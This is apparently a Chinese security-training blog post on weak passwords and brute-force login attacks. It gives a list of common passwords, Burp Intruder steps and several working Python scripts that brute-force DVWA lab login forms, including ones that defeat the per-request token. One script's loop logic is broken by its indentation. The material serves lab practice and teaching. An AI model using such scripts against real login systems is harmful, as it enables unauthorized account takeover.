DAY17:弱口令的探测与测试

已于 2022-09-22 17:01:37 修改
阅读量2.6k 收藏 9
点赞数 2
文章标签: python 安全 开发语言
于 2022-07-29 20:47:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49433473/article/details/126063702
版权
本文详细介绍了如何利用暴力破解技术,包括使用暴力破解模块爆破目录、验证码,以及针对FTP、SSH、远程桌面和WIFI的破解实例。从弱口令定义、危害到Python脚本实战,展示了如何通过burp工具和字典攻击来提高安全性意识。
摘要由CSDN通过智能技术生成

DAY17:弱口令的探测与测试

利用暴力破解模块进行爆目录

利用暴力破解模块爆破验证码

利用暴力破解模块

FTP暴力破解

SSH密码暴力破解

远程桌面暴力破解

WIFI暴力破解(需要设备)

短信验证码暴力破解 https://www.freebuf.com/articles/web/176701.html

​ https://www.freebuf.com/articles/web/228146.html

01 、弱口令定义

​ 弱口令(weak password)有严格和准确的定义,通常认为容易被别人(他们有可能对你很了解) 猜测到或被破解工具破解的口令均为弱口令。

​ 弱口令指的是仅包含简单数字和字母的口令,例如 “123”、“abc”等,因为这样的口令很容易被别人破解,从而使用户的计算机面临风险,因此不 推荐用户使用。

数字或字母顺序或倒序键盘字母顺序
123456
abcdef
123abc
qwerty

短语密码
5201314
iloveyou
woaini520

生日(姓名+生日)
19951223
lisi1009

常见管理员密码
admin
admin123
root
password

02 、弱口令的危害

​ 在当今很多地方以用户名(帐号)和口令作为鉴权的世界,口令的重要性就可想而知了。口令就相当于 进入家门的钥匙,当他人有一把可以进入你家的钥匙,想想你的安全、你的财物、你的隐私…害怕 了吧。因为弱口令很容易被他人猜到或破解,所以如果你使用弱口令,就像把家门钥匙放在家门口的 垫子下面,是非常危险的。

03 、暴力破解

​ 暴力破解的原理就是使用攻击者自己的用户名和密码字典,一个一个去枚举,尝试是否能够登录。理 论上来说,只要字典足够庞大,枚举总是能够成功的

04、 爆破实例

4.1、简单爆破

一、使用burp抓取登录数据包,并发送至intruder

请添加图片描述

二、设置payload,导入字典,开始爆破

请添加图片描述

4.2、seacms 无视验证码爆破

一、后台地址为http://IP/admin,用户为admin,密码未知,使用burp 抓取登录包,发送至intruder,设置payload进行爆破

请添加图片描述

05、python 脚本使用

import requests
url = "http://5920517e-390c-4c21-8b65-010ecace4619.node4.buuoj.cn:81/vulnerabilities/brute/"#proxies= {"http":"http://127.0.0.1:8080"}输入网址
#代理设置,方便burp抓包查看,,,,,url填写
header = {
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0',
'Cookie':'security=medium; PHPSESSID=bdi0ak5mqbud69nrnejgf8q00u'}
f = open('result.txt','w')
for admin in open("C:\\Users\\admin\\Documents\\字典\\账号.txt"):               #账号 字典--绝对路径
    for line in open("C:\\Users\\admin\\Documents\\字典\\密码.txt"):            #密码 字典--绝对路径
        username = admin.strip()
        password = line.strip()
        payload = {'username':username,'password':password,"Login":'Login'}
        Response = requests.get(url,params=payload,headers=header)
    if not(Response.text.find('Welcome to the password protected area')==-1):
        result = username + ':' + password
        print(result)
f.write(result + '\n')
print('\n完成')

from bs4 import BeautifulSoup
import requests

url = "http://1647f7ed-06fe-49b5-936b-d052146a4e42.node4.buuoj.cn:81/vulnerabilities/brute/"
user_token = 'ab34360a044a8761ec431b16eb5223ce'
header = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0',
    'Cookie': ' PHPSESSID=17u0i2fakm84eq9oc24boc8715 ; security=high '
}

def get_token(r):
    soup = BeautifulSoup(r.text, 'html.parser')
    user_token = soup.select('input[name="user_token"]')[0]['value']
    return user_token

if __name__ == "__main__":
    f = open('result.csv', 'w')     #把爆破结果储存到文件里,这里为csv格式
    f.write('用户名' + ',' + '密码' + ',' + '包长度' + '\n')    #给文件设置标题

    #遍历字典文件,暴力破解
    for admin in open("账号绝对路径"):
        for line in open("密码字典绝对路径"):
            username = admin.strip()
            password = line.strip()
            payload = {     #payload为POST的数据
                'username': username,
                'password': password,
                'user_token': user_token,
                'Login': 'Login'
            }

            Response = requests.post(url, data=payload, headers=header)
            # print(Response)
            req=requests.get(url,params=payload,headers=header)
            print(req.headers)
            len1=Response.headers['Content-Length']
            result = username + ',' + password + ',' + str(len1)   #用户名密码以及响应包长度

            print(result)           #输出到终端
            f.write(result + '\n')  #输出到文件
            user_token = get_token(Response)    #调用get_token函数获取下一次循环需要的token
    print('\n完成\n')
    f.close()

low:

import requests

def read_txt(): #txt文件读取为列表
    try:
        txtname = input(">>>输入txt文件名【例如name.txt】【需要和脚本在同一文件夹】\n: ")
        f = open(txtname, "r")
        lines = f.readlines()  # 读取全部内容 ,并以列表方式返回
        output = [x.strip() for x in lines]
    except:
        print(">>>>>警告!不存在该txt文件<<<<<")
        pass
    return output


url = "http://172.16.0.134/DVWA/vulnerabilities/brute/"
#url——DVWA low关卡

header = {      #编写请求头
    'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 Waterfox/56.6.2022.04',
    'Cookie':'security=low; user=admin; PHPSESSID=7e0d1aac877440784a5f98bd9fcc62fd'
}

f = open('返回包.csv','w')
f.write('状态码' + ',' + '用户名' + ',' + '密码' + ',' + 'content_length' + '\n')
#生成表格存储各种返回包

name_list=read_txt()
passwd_list=read_txt() #读取字典

for username in name_list:
    for password in passwd_list:

        payload = {'username':username,'password':password,"Login":'Login'}
        response = requests.get(url,params=payload,headers=header)
        content_length = response.headers['content-length']
        #print(content_length)
        result = str(response.status_code) + ',' + username + ','+ password + ',' + str(content_length)
        f.write(result + '\n')

f.close()
print('\n完成')

high:

​ Token在计算机身份认证中是令牌(临时)的意思,在词法分析中是标记的意思。一般作为邀请、登录系统使用

Token, 令牌,代表执行某些操作的权利的对象

访问令牌(Access token)表示访问控制操作主体的系统对象

邀请码 在邀请系统中使用

Token, Petri 网(Petri net)理论中的Token

密保令牌(Security token),或者硬件令牌,例如U盾,或者叫做认证令牌或者加密令牌,一种计算机身份校验的物理设备

会话令牌(Session token),交互会话中唯一身份标识符

令牌化技术 (Tokenization), 取代敏感信息条目的处理过程

# -*- coding: utf-8 -*-
# author = 'K0ctr'
import requests
import re
from bs4 import BeautifulSoup

def read_txt(): #txt文件读取为列表
    try:
        txtname = input(">>>输入txt文件名【例如name.txt】【需要和脚本在同一文件夹】\n: ")
        f = open(txtname, "r")
        lines = f.readlines()  # 读取全部内容 ,并以列表方式返回
        output = [x.strip() for x in lines]
    except:
        print(">>>>>警告!不存在该txt文件<<<<<")
        pass
    return output


ip = "172.16.0.134"
url = "http://%s/dvwa/vulnerabilities/brute/" % ip
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 Waterfox/56.6.2022.04',
    'Cookie': 'security=high; user=admin; PHPSESSID=7e0d1aac877440784a5f98bd9fcc62fd'
}   #编写请求头

name_list=read_txt()
passwd_list=read_txt() #读取字典
i=0

for username in name_list:
    if (i == 1): #退出器
        break

    for password in passwd_list:

        #访问暴力破解的页面,获取token;
        r = requests.get(url, headers=headers)
        soup = BeautifulSoup(r.text, "html.parser")
        token = soup.find_all("input")[3].get("value")  #获取token值

        #构造第二次输入的请求头,利用了第一次响应得到的token
        get_data = {
            "user_token": token,
            "username": username.strip(),
            "password": password.strip(),
            "Login": "Login"
        }
        print('用户名:', username.strip())
        print('密码:', password.strip())
        #发送请求,尝试登陆了
        r = requests.get(url, params=get_data, headers=headers)

        #响应包匹配文本来确定正确错误的情况
        if 'Username and/or password incorrect.' in r.text:
            print('>>>破解失败<<<')
        else:
            print('!!!!!!!!!!!!!!!!!!!!!!!!破解成功!!!!!!!!!!!!!!!!!!!!!!!!')
            print('-' * 20)
            i=1
            break
        print('-' * 20)

#-*- coding:utf-8 -*-
import requests
import time

dict_file=(r'D:\dir\PentesterSpecialDict-master\password-attacks\top10.txt')
u_name_list=['admin']
headers = {'Cookie':'security=high; PHPSESSID=cd2fhsr3h19lm0ipsqdgngj3fn','Referer':'http://127.0.0.1/test/dvwa/vulnerabilities/brute/'}

#访问login.php文件用来获取返回网页中的user_token
def get_http(u_name,p_word):
    url = 'http://127.0.0.1/test/DVWA/login.php'
    req = requests.get(url,headers=headers)
    return(url,req.status_code,req.text)

#带user_token登陆
def get_login(u_name,p_word,user_token):
    url = "http://127.0.0.1/test/DVWA/vulnerabilities/brute/?username="+u_name+"&password="+p_word+"&Login=Login"+"&user_token="+user_token
    req = requests.post(url,headers=headers)
    return(url,req.status_code,req.text)
    
print('++++++++开始密码暴力破解++++++++')
for list in u_name_list:
    u_name=list
    print('------目前用户'+u_name)
    f = open(dict_file,'r')
    for line in f:
        p_word = line.strip()
        #第一次访问login.php
        url,status_code,result=get_http(u_name,p_word)
        #查找user_token字符串的位置
        start = result.find('user_token')
        #获取user_token值
        user_token = result[start+19:start+51]
        #user_token = re.findall("<input.*?value=\'(.*?)' />", result)[0]
        #带user_token登陆
        url,status_code,result=get_login(u_name,p_word,user_token)
        print(u_name+'|'+p_word+'|'+url+'|'+str(status_code)+'|'+str(len(result)))
        #print(result)
    f.close()
print('++++++++结束密码暴力破解++++++++')
EdmunDJK
关注
弱口令爆破 实习day01
08-27
弱口令爆破 实习day01
弱口令(Weak Password)总结和爆破工具
Innocence_0的博客
03-16 1332
网站管理、运营人员由于安全意识不足,为了方便、避免忘记密码等,使用了非常容易记住的密码,或者是直接采用了系统的默认密码等。攻击者利用此漏洞可直接进入应用系统或者管理系统,从而进行系统、网页、数据的篡改与删除,非法获取系统、用户的数据,甚至可能导致服务器沦陷。弱口令(weak password)没有严格和准确的定义,通常认为容易被别人(他们有可能对你很了解)猜测到或被破解工具破解的口令均为弱口令
弱口令检测 c代码_全网弱口令一把梭
weixin_35120608的博客
01-28 613
01前言在一次测试中,偶遇了天融信的防火墙,弱口令测试未果,并且天融信的防火墙一般错误五次后会会锁定登录,所以也不能爆破弱口令,那么现实中这种系统还是很多的,我们可以走量,本篇文章介绍一下利用fofa爬取全网相同系统服务器,然后批量检测默认用户名密码的脚本的编写,本篇就以天融信的防火墙弱口令为例。我们的思路是通过fofa搜索目标系统服务器独有特征,例如系统的一些独有页面,然后脚本爬取我们...
CTFHub~密码口令|超详细避坑教程
最新发布
weixin_67832625的博客
08-08 541
弱口令通常是指被我们很容易猜到的账号和密码,安全系数不高的爆破。
Linux系统弱口令检测和网络端口扫描
weixin_53496421的博客
02-22 3042
文章标题系统弱口令检测操作步骤 系统弱口令检测 Joth the Ripper,简称JR 一款开源的密码分析工具,支持字典式的暴力破解 通过对shadow文件的口令分析,可以检测密码强度 官方网站:http://www.openwall.com/john/ 操作步骤 cd /opt tar zxvf john-1.9.0.tar.gz #解压工具包 yum -y install gcc gcc-c++ make
弱口令扫描工具有哪些?检测的主要方法及常用弱口令密码
白帽黑客鹏哥的博客
12-11 6339
弱口令工具主要用于密码破解、安全评估和网络防御测试。这些工具通过尝试一系列常用的弱口令检测系统或账户的安全性。
常用开源的弱口令检查审计工具
Marsal的博客
08-08 7067
常用的密码爆破工具
弱口令漏洞
xv7777666的博客
04-24 874
举例来说,如果有两个Payload标志位置,第一个Payload值为A和B,第二个Payload值为C和D,则发起攻击时,将共发起四次攻击,第一次使用的Payload分别为A和C,第二次使用的Payload分别为A和D,第三次使用的Payload分别为B和C,第四次使用的Payload分别为B和D。——它使用一组Payload集合,依次替换Payload位置上(一次攻击只能使用一个Payload位置)被§标志的文本(而没有被§标志的文本将不受影响),对服务器端进行请求,通常用于测试请求参数是否存在漏洞。
常用开源的弱口令检查审计工具_超级弱口令检测工具,网络安全高级工程师面试实战
04-16 1181
Hydra是一款非常强大的暴力破解工具,它是由著名的黑客组织THC开发的一款开源暴力破解工具。Hydra是一个验证性质的工具,主要目的是:展示安全研究人员从远程获取一个系统认证权限。Aircrack是破解WEP/WPA/WPA2加密的主流工具之一,现在排名第一,受广大小伙伴的喜爱,Aircrack-ng套件包含的工具可用于捕获数据包、握手验证。可用来进行暴力破解和字典攻击。
day-8:结构和测试用Ruby
07-01
第8天 - 结构体和测试用Ruby 测试是一种方式来获得快速反馈循环,并从一遍又一遍犯同样的错误阻止自己。 yourfile.rb : yourfile_test.rb 测验 考虑下面的数据,写代码: 输出“房子$府$南,从$城堡” 创建...
windows弱口令check工具和方法
03-12
windows系统的弱口令检查工具和方法。引用“彩虹table”暴力猜解windows系统弱口令。对于用户设置的简单密码可以短时间破译。
基于Python的自动扫描内网弱口令
05-09
这个代码中使用了两个辅助函数 `get_local_ip()` 和 `get_internal_ips()`。`get_local_ip()` 返回本地机器的IP地址,`get_internal_ips()` 返回当前内网可用的IP地址段列表。 然后定义了需要测试的用户名和密码字典,以及获取的内网IP地址段列表。接下来,对于每个IP地址和每个用户名和密码组合,它都会运行 `net use` 命令来测试它们是否能成功连接到主机。如果成功,就输出找到的弱口令并断开连接;否则,就输出连接失败的信息。 这个代码可以自动扫描本机所在内网中的所有主机,并测试它们的弱口令。但是需要注意的是,其可能会受到防火墙或其他安全设施的限制,导致无法连接内网中的某些主机。因此需要在合法授权和权限的前提下使用。
march-hack-day:新堆栈的测试
03-26
prisma/prisma.schema与Rails的模型和迁移重叠。 可以在此处定义一些数据库级别的验证(唯一约束等) pages/api包含在概念上类似于Rails控制器操作的API端点。 pages中的其他所有内容都是视图层,在React应用程序...
【Linux】基于密码字典的弱口令检测策略
小白鸽i的博客
12-28 1136
【Linux】基于密码字典的弱口令检测策略UOSA版、centos、redhat
Windows 应急响应篇(保姆级检查流程)
瑞雪掩晨曦的博客
10-24 1466
Windows 应急响应
弱口令检测、端口扫描
看清所以看轻
08-29 5643
John the Ripper和NMAP,前者用来检测系统账号的密码强度,后者用来执行端口扫描任务。 在Internet环境中,过于简单的口令是服务器面临的最大风险。尽管大家都知道设置一个更 长.更复杂的口令会更加安全,但总是会有一些用户因贪图方便而采用简单、易记的口令字串。对于任何一个承担着安全责任的管理员,及时找出这些弱口令账号是非常必要的,这样便于采取进一步的安全措施(如提醒用户重设更安全的...
超级弱口令工具+超级字典,攻防必备!
Python_0011的博客
03-24 2684
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。(都打包成一块的了,不能一一展开,总共300多集)
渗透测试
期待nila
12-06 793
什么是弱口令?什么是暴力破解?
软件测试实践:三角形判定与Next Day自动化测试
"这篇文档是关于软件测试实践的报告,主要涵盖了三角形构成问题和Next Day问题的实验设计,包括接口定义、函数实现、测试用例设计与参数化测试的运用。实验使用Java语言,结合JUnit4框架进行自动化测试。" 在软件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值